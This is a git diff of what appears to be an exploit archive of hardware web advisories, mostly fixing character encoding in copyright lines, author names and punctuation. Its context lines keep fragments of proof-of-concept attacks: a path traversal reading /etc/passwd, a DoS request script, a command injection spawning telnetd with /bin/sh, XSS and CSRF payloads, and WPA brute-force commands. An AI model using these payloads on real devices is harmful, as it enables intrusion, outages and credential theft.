(AV:N/AC:L/Au:S/C:N/I:P/A:N) Researcher: Juan Manuel Garcia @@ -50,24 +50,24 @@ attacker. In addition, an attacker may change router settings or gain unauthorized access Vendor Response: -2012-10-10 ? Vulnerability is identified. -2012-10-11 ? Vendor is contacted. -2012-10-12 ? Vulnerability details are sent to vendor. -2012-10-17 ? Vendor confirms vulnerability and states ?This vulnerability +2012-10-10 � Vulnerability is identified. +2012-10-11 � Vendor is contacted. +2012-10-12 � Vulnerability details are sent to vendor. +2012-10-17 � Vendor confirms vulnerability and states �This vulnerability has been escalated to our RD engineer but under current web server framework it is hard to fix. Our engineer team will modify the web server -framework to fix this. Currently it is under process but will take time?. -2012-10-25 ? Cybsec asks the vendor for the planned publication date for +framework to fix this. Currently it is under process but will take time�. +2012-10-25 � Cybsec asks the vendor for the planned publication date for the update. -2012-10-26 ? Vendor states ?I have no detailed schedule yet?. -2012-12-12 ? Cybsec asks if there are any news regarding the solution of +2012-10-26 � Vendor states �I have no detailed schedule yet�. +2012-12-12 � Cybsec asks if there are any news regarding the solution of reported vulnerabilities. -2012-12-12 ? Vendor states ?The fix of this reported vulnerability is not +2012-12-12 � Vendor states �The fix of this reported vulnerability is not included in the last firmware upgrade because the web server framework -change is still under development?. -2013-02-01 ? Cybsec tells the Vendor that the security advisory will be +change is still under development�. +2013-02-01 � Cybsec tells the Vendor that the security advisory will be published on Wednesday February 6. -2013-02-08 ? Having received no reply from TP-Link, vulnerability is +2013-02-08 � Having received no reply from TP-Link, vulnerability is released. Contact Information: diff --git a/platforms/hardware/webapps/24484.txt b/platforms/hardware/webapps/24484.txt index 46a32c013..3f4630a06 100755 --- a/platforms/hardware/webapps/24484.txt +++ b/platforms/hardware/webapps/24484.txt @@ -201,7 +201,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. -Copyright ? 2012 | Vulnerability Laboratory +Copyright � 2012 | Vulnerability Laboratory diff --git a/platforms/hardware/webapps/24497.txt b/platforms/hardware/webapps/24497.txt index de4650e54..7c910ff0b 100755 --- a/platforms/hardware/webapps/24497.txt +++ b/platforms/hardware/webapps/24497.txt @@ -198,7 +198,7 @@ low user interaction. For demonstration or reproduce ... Command Injection via Devicename PoC: -{"devcname":"IPad360 ?337","devctype":"ipad","pro":"false"} +{"devcname":"IPad360 �337","devctype":"ipad","pro":"false"} ... {"devcname":"[COMMAND INJECTION VIA DEVICENAME]","devctype":"ipad","pro":"false" Zugriffsbeschrnkungen -> Dienste -> neuen Dienst anlegen -> Dienstname + -> Zugriffsbeschränkungen -> Dienste -> neuen Dienst anlegen -> Dienstname Param: userdefined diff --git a/platforms/hardware/webapps/24517.txt b/platforms/hardware/webapps/24517.txt index e58da9a58..e6b954343 100755 --- a/platforms/hardware/webapps/24517.txt +++ b/platforms/hardware/webapps/24517.txt @@ -232,7 +232,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory + Copyright � 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/24550.txt b/platforms/hardware/webapps/24550.txt index 998cdacf9..da08175c3 100755 --- a/platforms/hardware/webapps/24550.txt +++ b/platforms/hardware/webapps/24550.txt @@ -250,7 +250,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2013 | Vulnerability Laboratory + Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/24740.txt b/platforms/hardware/webapps/24740.txt index 9572324f9..e799e3c11 100755 --- a/platforms/hardware/webapps/24740.txt +++ b/platforms/hardware/webapps/24740.txt @@ -119,7 +119,7 @@ PoC: (POST) Content-Disposition: form-data; name="file"; filename=">"../../../../cmd>home>tmp.png" Content-Type: image/png -???? +���� Review: Listing - Index @@ -137,7 +137,7 @@ PoC: (POST) Content-Disposition: form-data; name="file"; filename="pentest.php.js.html.gif" # < Include File with multiple file extensions - POST Content-Type: image/gif -???? +���� Review: Listing - Index @@ -186,7 +186,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory + Copyright � 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/25292.txt b/platforms/hardware/webapps/25292.txt index ef4717226..102ecf468 100755 --- a/platforms/hardware/webapps/25292.txt +++ b/platforms/hardware/webapps/25292.txt @@ -121,14 +121,14 @@ XSS PoC POST /apply.cgi HTTP/1.1 -?.. +�.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= -Other XSS PoC?s +Other XSS PoC�s ============================================= diff --git a/platforms/hardware/webapps/25413.txt b/platforms/hardware/webapps/25413.txt index 2815b298c..0464f5c3a 100755 --- a/platforms/hardware/webapps/25413.txt +++ b/platforms/hardware/webapps/25413.txt @@ -311,7 +311,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory + Copyright � 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/25416.txt b/platforms/hardware/webapps/25416.txt index b4a8ed441..40fa2e10e 100755 --- a/platforms/hardware/webapps/25416.txt +++ b/platforms/hardware/webapps/25416.txt @@ -111,7 +111,7 @@ Proof of Concept: - iPad 360 ?337%20>"<../[LOCAL COMMAND INJECTION VULNERABILITY]\'> + iPad 360 �337%20>"<../[LOCAL COMMAND INJECTION VULNERABILITY]\'> @@ -180,7 +180,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory + Copyright � 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/26174.txt b/platforms/hardware/webapps/26174.txt index 31da2102e..6c2dae047 100755 --- a/platforms/hardware/webapps/26174.txt +++ b/platforms/hardware/webapps/26174.txt @@ -19,7 +19,7 @@ Multiple vulnerabilities have been found in this devices: 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. -Its possible others models are affected but they were not checked. +It’s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) @@ -32,7 +32,7 @@ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrat _____________________________________________________________________________ 4.2.Relative Path Traversal -CVE-2013-3541, Transversal Path thats allow you to read file system configuration. +CVE-2013-3541, Transversal Path that’s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ @@ -50,17 +50,17 @@ CVE-2013-3687 You can find all the sensitive information about the device in pla You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) -Use CVE-2013-3691, DoS by overbuffing path /. A request with a large number of a can take down the http service from the camera device. +Use CVE-2013-3691, DoS by overbuffing path ‘/’. A request with a large number of ‘a’ can take down the http service from the camera device. _____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect -It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera wont recuperate ever itself +It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won’t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ - @ request = 'GET /' + A * 3000 + '.html HTTP/1.0\r\n' + @ request = 'GET /' + ‘A’ * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @@ -70,9 +70,9 @@ _____________________________________________________________________________ 5.Credits --CVE-2013-3541 was discovered by Eliezer Varad Lopez, Javier Repiso Snchez and Jons Ropero Castillo. --CVE-2013-3691 was discovered by Javier Repiso Snchez and Jons Ropero Castillo --CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jons Ropero Castillo. +-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. +-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo +-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. diff --git a/platforms/hardware/webapps/26401.txt b/platforms/hardware/webapps/26401.txt index 0f97bb52b..ee51868ad 100755 --- a/platforms/hardware/webapps/26401.txt +++ b/platforms/hardware/webapps/26401.txt @@ -26,8 +26,8 @@ Exploit: Factory Reset - -
Do you want to restore Print Server to factory default setting?

Do you want to restore Print Server to factory default setting? +
  @@ -41,7 +41,7 @@ Exploit: - + @@ -190,7 +190,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2013 | Vulnerability Laboratory + Copyright © 2013 | Vulnerability Laboratory diff --git a/platforms/hardware/webapps/31790.txt b/platforms/hardware/webapps/31790.txt index 228cb0045..44b511005 100755 --- a/platforms/hardware/webapps/31790.txt +++ b/platforms/hardware/webapps/31790.txt @@ -150,7 +150,7 @@ PoC: Create User Object > Create User Expression - Listing -????? +​​​​​ ​​​​​
IP Address: IP Address: @@ -68,8 +68,8 @@ Exploit:
@@ -49,15 +49,15 @@ Exploit: - + - + - +
IP Address::  
Subnet Mask::  
Default Gateway::  
- - + +
    
diff --git a/platforms/hardware/webapps/26496.txt b/platforms/hardware/webapps/26496.txt index 10a3d7fff..16432bfde 100755 --- a/platforms/hardware/webapps/26496.txt +++ b/platforms/hardware/webapps/26496.txt @@ -268,7 +268,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory + Copyright � 2013 | Vulnerability Laboratory -- diff --git a/platforms/hardware/webapps/26527.txt b/platforms/hardware/webapps/26527.txt index e11dd8667..44621a794 100755 --- a/platforms/hardware/webapps/26527.txt +++ b/platforms/hardware/webapps/26527.txt @@ -1,4 +1,4 @@ -? + Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities diff --git a/platforms/hardware/webapps/27005.txt b/platforms/hardware/webapps/27005.txt index fcfda69c9..c53a21818 100755 --- a/platforms/hardware/webapps/27005.txt +++ b/platforms/hardware/webapps/27005.txt @@ -38,7 +38,7 @@ Blocks downloads based on file type Blocks applications that access the Internet, including IM, music services, and software update utilities Integrates with safe search filters built into popular images search engines Provides integrated gateway and desktop spyware protection -Uses Barracuda Web Security Agents compatible with Windows PCs and Macs to enforce Internet policies on off-network computers +Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to enforce Internet policies on off-network computers The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies @@ -193,7 +193,7 @@ Exploitation of the vulnerability requires low or medium user interaction & low Vulnerable Module(s): [+] Web Filter & Web Firewall - Advanced (Extended) > SSL Inspection > Certificate Creation [x] CHECK > Zertifikat Generierung - [+] Spam & Virus - Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Besttigt durch CA) + [+] Spam & Virus - Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA) [+] Spam & Virus - Sicherheitsverwaltung > Certificate Signing Request (CSR) > Edit Data Listing [+] Load Balancer - Zertifikat Generierung (INDEX) @@ -270,7 +270,7 @@ http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?password=fb85b10f5d66b87b1194fef&e content_only=1&new_secondary_tab=ssl&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_csr&ispopup=1& parent_name=ssl&popup_width=900&popup_height=455 -Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Besttigt durch CA) +Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA) http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?&user=benjamin&password=06577ccae825950cd833027d&et=1350572515&auth_type=Local&locale=de_DE &primary_tab=ADVANCED&secondary_tab=ssl @@ -367,7 +367,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2013 | Vulnerability Laboratory [Evolution Security] + Copyright © 2013 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/hardware/webapps/27006.txt b/platforms/hardware/webapps/27006.txt index 564ed9860..88c71ccca 100755 --- a/platforms/hardware/webapps/27006.txt +++ b/platforms/hardware/webapps/27006.txt @@ -276,7 +276,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] + Copyright � 2013 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/hardware/webapps/28279.txt b/platforms/hardware/webapps/28279.txt index b2f4fe4fb..6f9b18833 100755 --- a/platforms/hardware/webapps/28279.txt +++ b/platforms/hardware/webapps/28279.txt @@ -66,7 +66,7 @@ Many other changes can be performed. -- Un saludo, -Mat?as Mingorance Svensson +Mat�as Mingorance Svensson *OWASP Foundation, Open Web Application Security Project* https://www.owasp.org http://es.linkedin.com/in/matiasms diff --git a/platforms/hardware/webapps/28562.txt b/platforms/hardware/webapps/28562.txt index 49942c0b0..cad911954 100755 --- a/platforms/hardware/webapps/28562.txt +++ b/platforms/hardware/webapps/28562.txt @@ -1,6 +1,6 @@ # Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability # Date: 26.09.2013r. -# Exploit Author: Hubert Grądek (PL) +# Exploit Author: Hubert GrÄ…dek (PL) # Software Link: [download link if available] # Tested on: HP-E2620 24-PoEP // RA.15.05.0006,ROMRA.15.10 diff --git a/platforms/hardware/webapps/29131.rb b/platforms/hardware/webapps/29131.rb index e3b573021..2a2600125 100755 --- a/platforms/hardware/webapps/29131.rb +++ b/platforms/hardware/webapps/29131.rb @@ -10,11 +10,11 @@ # Connecting to 192.168.0.1:80... connected. # HTTP request sent, awaiting response... 200 OK # Length: 3518 (3.4K) [application/octet-stream] -# Saving to: router.data +# Saving to: ‘router.data’ # # 100%[=============================================================================================================>] 3,518 --.-K/s in 0s # -# 2013-10-17 18:21:28 (108 MB/s) - router.data saved [3518/3518] +# 2013-10-17 18:21:28 (108 MB/s) - ‘router.data’ saved [3518/3518] # # box:arris-dev cosmo$ tar vxf router.data # x backup/ diff --git a/platforms/hardware/webapps/29262.pl b/platforms/hardware/webapps/29262.pl index 749bb6ca9..dc90c0022 100755 --- a/platforms/hardware/webapps/29262.pl +++ b/platforms/hardware/webapps/29262.pl @@ -1,9 +1,9 @@ -?#!/usr/bin/perl -#Author: Sebastin Magof +#!/usr/bin/perl +#Author: Sebastián Magof #Vulnerable file: wansinglecfg.cmd #Bug: Password Disclosure # (\/) -# (**) ?lpha +# (**) αlpha #(")(") #usage:perl exploit.pl use LWP::UserAgent; diff --git a/platforms/hardware/webapps/29266.txt b/platforms/hardware/webapps/29266.txt index 5ff450653..8808b4b2b 100755 --- a/platforms/hardware/webapps/29266.txt +++ b/platforms/hardware/webapps/29266.txt @@ -1,10 +1,10 @@ -Stem Innovation IZON Hard-coded Credentials (CVE-2013-6236) +Stem Innovation ‘IZON’ Hard-coded Credentials (CVE-2013-6236) Mark Stanislav - mstanislav@duosecurity.com I. DESCRIPTION --------------------------------------- -Stem Innovation's IP camera called IZON utilizes numerous hard-coded credentials within its Linux distribution and also the hidden web application running on the camera. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the camera. Further, using the web interface credentials will provide access to a camera stream and configuration details, including third-party API keys. +Stem Innovation's IP camera called ‘IZON’ utilizes numerous hard-coded credentials within its Linux distribution and also the hidden web application running on the camera. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the camera. Further, using the web interface credentials will provide access to a camera stream and configuration details, including third-party API keys. II. TESTED VERSION @@ -39,16 +39,16 @@ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6236 VI. TIMELINE --------------------------------------- 09/06/2013 - Initial vendor contact stating I wanted to discuss a variety of security issues -09/06/2013 - Vendors help desk responded and asked for clarification about my request -09/06/2013 - Responded to the vendors help desk and reaffirmed my purpose for contact +09/06/2013 - Vendor’s help desk responded and asked for clarification about my request +09/06/2013 - Responded to the vendor’s help desk and reaffirmed my purpose for contact 09/16/2013 - Updated my existing help desk ticket after not hearing back in 10 days 09/19/2013 - Received a response back to contact their CEO directly about these issues -09/19/2013 - E-mailed the vendors CEO with synopsis details and severity ratings for the key issues +09/19/2013 - E-mailed the vendor’s CEO with synopsis details and severity ratings for the key issues 09/30/2013 - I opened up a new help desk ticket to follow-up after not hearing from their CEO after 11 days 10/01/2013 - The new case was updated saying that their CEO was aware of my email and would respond 10/03/2013 - I received a follow-up from their CTO with no specific details about plans to fix issues 10/03/2013 - Followed-up with the CTO to ask for specific details about the issues I had found -10/14/2013 - CTO responded asking to meet to discuss my findings but again offered no details +10/14/2013 - CTO responded asking to “meet” to discuss my findings but again offered no details 10/14/2013 - Offered up time ranges for the next day that were viable to discuss my findings 10/17/2013 - Public presentation of camera research which included these issues 10/28/2013 - Still no response from vendor on confirmation of fixes or a timeline to do so \ No newline at end of file diff --git a/platforms/hardware/webapps/29794.txt b/platforms/hardware/webapps/29794.txt index 1c0990145..d74127e84 100755 --- a/platforms/hardware/webapps/29794.txt +++ b/platforms/hardware/webapps/29794.txt @@ -2,13 +2,13 @@ vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 -# Exploit Author: Sebastin Magof +# Exploit Author: Sebastián Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) -# (**) ?lpha +# (**) αlpha #(")(") diff --git a/platforms/hardware/webapps/29795.pl b/platforms/hardware/webapps/29795.pl index 7f9e45b44..b29737e9a 100755 --- a/platforms/hardware/webapps/29795.pl +++ b/platforms/hardware/webapps/29795.pl @@ -1,6 +1,6 @@ #!/usr/bin/perl -#Author: Sebastin Magof +#Author: Sebastián Magof #Hardware: pirelli discus DRG A125g @@ -12,7 +12,7 @@ # (\/) -# (**) lpha +# (**) ±lpha #(")(") diff --git a/platforms/hardware/webapps/29796.pl b/platforms/hardware/webapps/29796.pl index 81f9030ca..872c8953b 100755 --- a/platforms/hardware/webapps/29796.pl +++ b/platforms/hardware/webapps/29796.pl @@ -2,13 +2,13 @@ vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 -# Exploit Author: Sebastin Magof +# Exploit Author: Sebastián Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) -# (**) ?lpha +# (**) αlpha #(")(") diff --git a/platforms/hardware/webapps/30358.txt b/platforms/hardware/webapps/30358.txt index faed6bb0d..388cb55cc 100755 --- a/platforms/hardware/webapps/30358.txt +++ b/platforms/hardware/webapps/30358.txt @@ -12,42 +12,42 @@ The Cisco EPC 2425 routers supplied by UPC are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker. The WPA-PSK pass phrase has the following features: -? Random -? A to Z Uppercase only -? 8 characters long -? 208,827,064,576 possible combinations ( AAAAAAAA ? ZZZZZZZZ ) 26^8 +• Random +• A to Z Uppercase only +• 8 characters long +• 208,827,064,576 possible combinations ( AAAAAAAA – ZZZZZZZZ ) 26^8 We notified UPC about the problem in November 2011 yet UPC are still supplying customers with newer modems / horizon boxes that use this algorithm. At the time, graphics cards were expensive and clustering several machines was not financially viable to the average hacker. We recently purchased a used rig, comprising off: -? Windows 7 -? I3 Processor -? 4GB RAM -? 2TB Drive -? Radeon HD 5850 +• Windows 7 +• I3 Processor +• 4GB RAM +• 2TB Drive +• Radeon HD 5850 -We generated 26 dictionary files using ?mask processor? by ATOM, piping each letter out to its own file, for example: +We generated 26 dictionary files using “mask processor” by ATOM, piping each letter out to its own file, for example: -A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA ? AZZZZZZZ -B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA ? BZZZZZZZ +A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA – AZZZZZZZ +B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA – BZZZZZZZ etc -Each .txt file weighed in at around 60GB?s each. The 26 files took up about 1.6TB of storage. +Each .txt file weighed in at around 60GB’s each. The 26 files took up about 1.6TB of storage. We now had the complete key space, partitioned into 26 different files. This allowed us to distribute the brute force attack amongst multiple computers. There are other ways with ocl-hashcat but this was the simplest. Using our Radeon HD5850 on standard settings, we were hitting 80,000 keys per second. Breakdown below: -? 26^8 = 208,827,064,576 ( 208 billion possible combinations ) -? 26^8 / 80,000 keys per second = 2,610,338 seconds -? 2,610,338 / 60 seconds = 43,505 minutes -? 43,505 / 60 minutes = 725 hours -? 725 hours / 24 hours = 30 Days +• 26^8 = 208,827,064,576 ( 208 billion possible combinations ) +• 26^8 / 80,000 keys per second = 2,610,338 seconds +• 2,610,338 / 60 seconds = 43,505 minutes +• 43,505 / 60 minutes = 725 hours +• 725 hours / 24 hours = 30 Days -For ?185, we had built a computer that could crack the default UPC wireless password within 30 days. The WPA-PSK handshake we used started with the letter D and was cracked within 96 hours. +For €185, we had built a computer that could crack the default UPC wireless password within 30 days. The WPA-PSK handshake we used started with the letter D and was cracked within 96 hours. We ended up getting a second machine for the same price which resulted in our maximum cracking time being reduced to 15 days. -If you?re using the default password on your UPC broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols. +If you’re using the default password on your UPC broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols. diff --git a/platforms/hardware/webapps/30362.txt b/platforms/hardware/webapps/30362.txt index c3a3d9875..bb62d6cb4 100755 --- a/platforms/hardware/webapps/30362.txt +++ b/platforms/hardware/webapps/30362.txt @@ -1,5 +1,5 @@ ####################################################################### -# Exploit Title: Cisco EPC3925 ? Cross Site Request Forgery +# Exploit Title: Cisco EPC3925 � Cross Site Request Forgery # Google Dork: N/A # Date: 12-11-2013 # Exploit Author: Jeroen - IT Nerdbox diff --git a/platforms/hardware/webapps/30723.php b/platforms/hardware/webapps/30723.php index 505e00352..b51983ead 100755 --- a/platforms/hardware/webapps/30723.php +++ b/platforms/hardware/webapps/30723.php @@ -859,7 +859,7 @@ enabled for telnet\n"; curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "u=" . $telnet_user . "&p=" . -$telnet_pass . "ok=" . $sectok ."&do=login&id=start"); +$telnet_pass . "§ok=" . $sectok ."&do=login&id=start"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @@ -906,7 +906,7 @@ $telnet_pass . " curl_setopt($ch, CURLOPT_POST, true); - curl_setopt($ch, CURLOPT_POSTFIELDS, "config[phpok]=1ok=" . + curl_setopt($ch, CURLOPT_POSTFIELDS, "config[phpok]=1§ok=" . $sectok . "&do=admin&page=config&save=1&submit=Save"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); diff --git a/platforms/hardware/webapps/31430.txt b/platforms/hardware/webapps/31430.txt index 754f69057..d47a1c2c5 100755 --- a/platforms/hardware/webapps/31430.txt +++ b/platforms/hardware/webapps/31430.txt @@ -64,7 +64,7 @@ vulnerability. 6. Credit The vulnerability was originally discovered in an Inteno DG301 device, -by Juan J. Gelfo at Encripto AS. +by Juan J. Güelfo at Encripto AS. E-mail: post@encripto.no Web: http://www.encripto.no diff --git a/platforms/hardware/webapps/31569.txt b/platforms/hardware/webapps/31569.txt index 70d45d57e..b6efb2777 100755 --- a/platforms/hardware/webapps/31569.txt +++ b/platforms/hardware/webapps/31569.txt @@ -18,4 +18,4 @@ POC=> -cincin +cincin°°° diff --git a/platforms/hardware/webapps/31617.txt b/platforms/hardware/webapps/31617.txt index 6cb594b38..aae4722cd 100755 --- a/platforms/hardware/webapps/31617.txt +++ b/platforms/hardware/webapps/31617.txt @@ -145,7 +145,7 @@ Using this vulnerability, BAE Systems was able to execute arbitrary commands on Proof of concept ---------------- -Example exploitation demonstrating the issue through use of the ?sleep? command to delay the response from the server: +Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server: POST /dnslookup.cgi HTTP/1.1 Host: 192.168.0.1 @@ -173,7 +173,7 @@ hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup Solution -------- -Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (?.?) and hyphens ('-'). +Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (‘.’) and hyphens ('-'). @@ -233,7 +233,7 @@ Sent telnet enable payload to '192.168.0.1:23' Solution -------- -Remove the backdoor feature from the device. If a ?last resort? admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function. +Remove the backdoor feature from the device. If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function. @@ -432,7 +432,7 @@ Restrict access to webpages containing sensitive functionality or data to authen Requires -------- -Control of the user?s network, for example at the ISP level or local network. +Control of the user’s network, for example at the ISP level or local network. Description diff --git a/platforms/hardware/webapps/31765.txt b/platforms/hardware/webapps/31765.txt index 2bca8a19a..234a4918b 100755 --- a/platforms/hardware/webapps/31765.txt +++ b/platforms/hardware/webapps/31765.txt @@ -30,7 +30,7 @@ Product & Service Introduction: The Barracuda Message Archiver is a complete and affordable email archiving solution, enabling you to effectively index and preserve all emails, enhance operational efficiencies and enforce policies for regulatory compliance. By leveraging standard policies and seamless access to messages, email content is fully indexed and backed up to enable -administrators, auditors and end users quick retrieval of any email message stored in an organizations email archive. +administrators, auditors and end users quick retrieval of any email message stored in an organization’s email archive. * Comprehensive archiving * Exchange stubbing @@ -91,7 +91,7 @@ Technical Details & Description: A persistent input validation vulnerability has been discovered in the official Barracuda Networks Message Archiver 650 v3.1.0.914 appliance web-application. The remote vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable message archiver module. -The vulnerability is located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domnen` module. Remote attackers are able to inject own malicious script +The vulnerability is located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domänen` module. Remote attackers are able to inject own malicious script codes with persistent attack vector in the vulnerable domain_list_table-r0 parameter. The execution of the script code occurs in the domain_list_table-r0 and user_domain_admin:1 appliance application response context. The request method is POST and the attack vector is persistent on the application-side of the barracuda networks message archiver appliance. The security risk of the input validation web vulnerability is @@ -104,7 +104,7 @@ Request Method(s): [+] POST Vulnerable Module(s): - [+] Benutzer > Neu Anlegen > Rolle: Auditor > Domnen + [+] Benutzer > Neu Anlegen > Rolle: Auditor > Domänen Vulnerable Parameter(s): [+] domain_list_table-r0 @@ -116,7 +116,7 @@ Proof of Concept (PoC): The persistent web vulnerability can be exploited by remote attacker with low privileged application user account and low required user inter action. For security demonstration or to reproduce the remote vulnerability follow the provided information and steps below. -Benutzer > Neu Anlegen > Rolle: Auditor > Domnen > (domain_list_table-r0) +Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0) POST REQUEST: ajax_bc_sub=addDomain @@ -136,10 +136,10 @@ secondary_tab=per_user_add_update URL: http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23& primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM -PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domnen > (domain_list_table-r0) +PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0) 		- %20?????">?????
